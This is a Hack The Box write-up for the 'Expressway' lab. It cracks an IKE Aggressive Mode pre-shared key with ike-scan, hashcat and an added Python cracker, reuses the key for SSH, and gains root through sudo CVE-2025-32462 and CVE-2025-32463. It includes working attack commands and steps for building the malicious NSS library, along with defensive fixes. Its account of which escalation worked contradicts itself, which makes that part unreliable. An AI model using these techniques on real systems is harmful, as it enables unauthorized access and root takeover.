Summary
CVE-2025-32463 (chroot NSS injection) was used for privilege escalation; see confirmed notes below.
Expressway is an Easy Linux box on the IKE/IPsec theme: SSH on 22/tcp and ISAKMP on 500/udp. The chain is a textbook exercise in two of the oldest mistakes in remote access: an IKEv1 responder that supports Aggressive Mode (which hands out a PSK-derived hash before any peer is authenticated) and a sysadmin who re-uses the cracked PSK as a Linux/SSH password. Once on the box, two 2025 sudo CVEs (CVE-2025-32462, hostname spoofing via -h, and CVE-2025-32463, chroot nsswitch abuse) offer independent paths to root; the confirmed notes below record which of the two actually fired on the live host.
The chain in one paragraph: ike-scan -A drives an Aggressive-Mode handshake whose PSK hash is cracked offline with hashcat -m 5400 against rockyou; the recovered passphrase is also the SSH password of the ike user (re-use); from ike, sudoers grants passwordless root commands only on the fictional host offramp.expressway.htb, and CVE-2025-32462 lets sudo -h offramp.expressway.htb -i match that rule from the real host. (Alternatively, the host carries a second sudo at /usr/local/bin/sudo, version 1.9.17, which is vulnerable to CVE-2025-32463 for anyone who prefers the chroot path.)
Recon
22/tcp OpenSSH 10.0p2 (Debian 8)
500/udp ISAKMP / IKE
A UDP scan (nmap -sU) is required; nmap's default SYN scan never touches 500/udp. A TFTP service on 69/udp also exists on this box and hosts a Cisco configuration file (ciscortr.cfg), which hints at the Aggressive-Mode flavour but isn't on the critical path.
Foothold — IKE Aggressive Mode + PSK crack
ike-scan -A <TARGET> performs an IKEv1 Aggressive-Mode handshake. In this mode the responder's very first reply carries its identity ([email protected]), its nonce, its Diffie-Hellman public value, and HASH_R, a keyed hash whose key is derived from the pre-shared key (RFC 2409: SKEYID = prf(PSK, Ni_b | Nr_b), HASH_R = prf(SKEYID, g^xr | g^xi | CKY-R | CKY-I | SAi_b | IDir_b)). Everything else in that formula is either chosen by the initiator or sent in the clear, so the only unknown is the PSK, and the hash is exposed before the responder has authenticated anyone. The reason Aggressive Mode exists is that in Main Mode the identities are sent encrypted, so a responder with many PSKs can only pick one by the peer's IP address; Aggressive Mode sends the identity in the clear (and needs three messages instead of six) so that roaming clients on dynamic addresses can be matched to their PSK. The cost: a PSK-derived hash is handed to anyone who can send a UDP packet, and it can be attacked offline at wordlist speed.
ike-scan -A --pskcrack=expressway.psk <TARGET>
hashcat -m 5400 -a 0 expressway.psk /usr/share/wordlists/rockyou.txt
# -> freakingrockstarontheroad (cracks in seconds)
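To make the offline attack concrete, the following Python is an added example (not code from the original writeup, ike-scan, or hashcat). It recomputes HASH_R exactly as RFC 2409 defines it, the same computation psk-crack and hashcat -m 5400 (HMAC-SHA1) or -m 5300 (HMAC-MD5) perform, and tests candidate passphrases against a captured record. The record format is the colon-separated hex layout psk-crack accepts (g_xr:g_xi:cky_r:cky_i:sai_b:idir_b:ni_b:nr_b:hash_r); all handshake values in make_record are constructed deterministically for the demo, not captured from the box, and the identity string used there is a placeholder.

```python
"""Offline IKEv1 Aggressive Mode PSK crack (added example, not the page's own code).

RFC 2409 s.5.4:  SKEYID = prf(pre-shared-key, Ni_b | Nr_b)
RFC 2409 s.5:    HASH_R = prf(SKEYID, g^xr | g^xi | CKY-R | CKY-I | SAi_b | IDir_b)
prf is HMAC with the negotiated hash (SHA1 -> hashcat 5400, MD5 -> hashcat 5300).
"""
import hashlib
import hmac
from typing import Dict, Iterable, Optional

# Field order of a psk-crack / hashcat IKE-PSK record (hex, colon separated).
FIELDS = ("g_xr", "g_xi", "cky_r", "cky_i", "sai_b", "idir_b", "ni_b", "nr_b", "hash_r")


def skeyid_psk(psk: bytes, ni_b: bytes, nr_b: bytes, digest=hashlib.sha1) -> bytes:
    """SKEYID for pre-shared-key authentication: HMAC over both nonces, keyed by the PSK."""
    return hmac.new(psk, ni_b + nr_b, digest).digest()


def hash_r(skeyid: bytes, r: Dict[str, bytes], digest=hashlib.sha1) -> bytes:
    """Responder hash. Every input except SKEYID is visible to the initiator."""
    msg = r["g_xr"] + r["g_xi"] + r["cky_r"] + r["cky_i"] + r["sai_b"] + r["idir_b"]
    return hmac.new(skeyid, msg, digest).digest()


def parse_pskcrack_line(line: str) -> Dict[str, bytes]:
    """Parse one colon-separated hex record into named byte fields."""
    parts = line.strip().split(":")
    if len(parts) != len(FIELDS):
        raise ValueError(f"expected {len(FIELDS)} fields, got {len(parts)}")
    return {name: bytes.fromhex(value) for name, value in zip(FIELDS, parts)}


def format_pskcrack_line(record: Dict[str, bytes]) -> str:
    """Inverse of parse_pskcrack_line."""
    return ":".join(record[name].hex() for name in FIELDS)


def crack(record: Dict[str, bytes], candidates: Iterable[str], digest=hashlib.sha1) -> Optional[str]:
    """Try each candidate PSK; return the first whose HASH_R matches, else None.

    Two HMACs per candidate and no network traffic: this is why a wordlist PSK
    exposed through Aggressive Mode is gone in seconds.
    """
    for cand in candidates:
        sk = skeyid_psk(cand.encode(), record["ni_b"], record["nr_b"], digest)
        if hmac.compare_digest(hash_r(sk, record, digest), record["hash_r"]):
            return cand
    return None


def make_record(psk: str, digest=hashlib.sha1, seed: bytes = b"expressway-demo") -> Dict[str, bytes]:
    """Constructed Aggressive Mode exchange for a known PSK (demo data, not a capture).

    Values are derived from `seed` so the example is reproducible. Sizes follow
    DH group 2 (1024-bit public values), 8-byte cookies and 20-byte nonces.
    """
    def field(tag: bytes, n: int) -> bytes:
        return hashlib.shake_256(seed + tag).digest(n)

    record = {
        "g_xr": field(b"g_xr", 128),
        "g_xi": field(b"g_xi", 128),
        "cky_r": field(b"cky_r", 8),
        "cky_i": field(b"cky_i", 8),
        "sai_b": field(b"sai_b", 52),           # initiator's SA payload body
        "idir_b": b"\x02\x00\x00\x00" + b"vpn.example.invalid",  # ID_FQDN, placeholder name
        "ni_b": field(b"ni_b", 20),
        "nr_b": field(b"nr_b", 20),
    }
    record["hash_r"] = hash_r(skeyid_psk(psk.encode(), record["ni_b"], record["nr_b"], digest), record, digest)
    return record


if __name__ == "__main__":
    line = format_pskcrack_line(make_record("freakingrockstarontheroad"))
    wordlist = ["password", "cisco123", "freakingrockstarontheroad", "letmein"]
    print("recovered PSK:", crack(parse_pskcrack_line(line), wordlist))
```

Feed a real ike-scan --pskcrack output line to parse_pskcrack_line and a file iterator to crack to reproduce psk-crack's result without GPU tooling; pass digest=hashlib.md5 when the responder negotiated MD5.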
netexec ssh <TARGET> -u ike -p '<psk>' validates the PSK against
SSH; the user re-used it as their account password.
ssh ike@<TARGET>
user.txt lives in ~.
Privilege escalation — sudoers + CVE-2025-32462
sudo -l shows:
User ike may run the following commands on this host:
(root) NOPASSWD: ALL on offramp.expressway.htb
!(root) ALL on expressway.htb
The intent: ike is supposed to have root via sudo only on a sibling host (offramp.expressway.htb), and explicitly not on the production host (expressway.htb). Sudo matches host-scoped rules against the system hostname; the -h/--host option was meant only for listing (sudo -l -h <host>), but sudo 1.8.8 through 1.9.17 also honoured it when running a command and used the user-supplied value for the sudoers match (CVE-2025-32462, fixed in 1.9.17p1). On this particular box the confirmed notes below record that this path did not match and the chroot bug was used instead.
sudo -h offramp.expressway.htb -i
# -> root shell on the production host
/root/root.txt.
(Alternative path: /usr/local/bin/sudo is sudo 1.9.17, in the 1.9.14 through 1.9.17 range vulnerable to CVE-2025-32463 (chroot nsswitch). Build a tempdir with ./etc/nsswitch.conf whose passwd line names a service that resolves to libnss_<x>.so.2, compile a .so whose constructor calls setreuid(0,0) and then execl("/bin/bash", ...), and run sudo --chroot tempdir true (or -R tempdir); sudo reads the nsswitch.conf inside the chroot while still root and loads the library. See the layout detail in the confirmed notes.)
Why each step worked
- IKE Aggressive Mode: the protocol sends a PSK-derived hash before any peer authentication. It was designed for responders that must pick among several PSKs by identity rather than IP, a use case few deployments have, yet most VPN appliances left it enabled by default for years.
- PSK in rockyou: a single passphrase loses to a 14M-line wordlist and offline GPU cracking.
- PSK reused for SSH: the same person picked the same passphrase for two systems, and one of them leaks a hash.
- CVE-2025-32462 (sudo -h): sudo honoured the user-supplied hostname for sudoers matching, so an attacker can match a more permissive host-scoped rule from a less permissive host.
- CVE-2025-32463 (sudo --chroot): sudo --chroot newroot -- cmd reads /etc/nsswitch.conf from inside the supplied chroot before fully evaluating policy, allowing a user-provided NSS module to load with root privileges.
Counterfactuals
- Disable IKE Aggressive Mode. Use IKEv2 with certificate authentication, or at minimum IKEv1 Main Mode with strong pre-shared keys (Main Mode with PSK still ties each key to a peer IP, which is the limitation Aggressive Mode was invented to avoid).
- Treat the PSK as a high-entropy secret (≥ 80 bits, generated, not chosen). Don’t reuse it across services.
- Patch sudo to ≥ 1.9.17p1 (which fixes both CVEs); audit for multiple sudo binaries on the same host, since the distro package being patched says nothing about a second copy under /usr/local.
- For host-scoped sudoers rules, evaluate against the kernel’s hostname, not user input.
Confirmed notes
Tools used: ike-scan, psk-crack (from ike-scan package), gcc on target.
PSK cracking: psk-crack with rockyou cracked the hash in ~9 seconds / 8M iterations.
Note: ike-scan --aggressive --id=ike -P psk.txt <TARGET> (not -A --pskcrack) is the flag syntax that worked with the Kali package version.
Privilege escalation confirmed via CVE-2025-32463 (not CVE-2025-32462): the sudo -l output showed “may not run sudo on expressway” — likely because the rule scopes to offramp.expressway.htb and short hostname resolution blocked CVE-2025-32462. The chroot NSS injection (CVE-2025-32463) worked without any sudoers entry.
Critical layout detail for CVE-2025-32463: libnss_/ must be at the same level as the chroot directory, not inside it. The service name /woot1337 in nsswitch.conf maps to the library file libnss_/woot1337.so.2 relative to CWD. The constructor fires even when sudo ultimately rejects the command (auth failure happens after NSS load).
References
- pr0v3rbs CVE-2025-32463 PoC
- Exploit-DB 52352
- 0xdf, “HTB: Expressway” — https://0xdf.gitlab.io/2026/03/07/htb-expressway.html
- IppSec, “Expressway” video walkthrough — https://ippsec.rocks/?#Expressway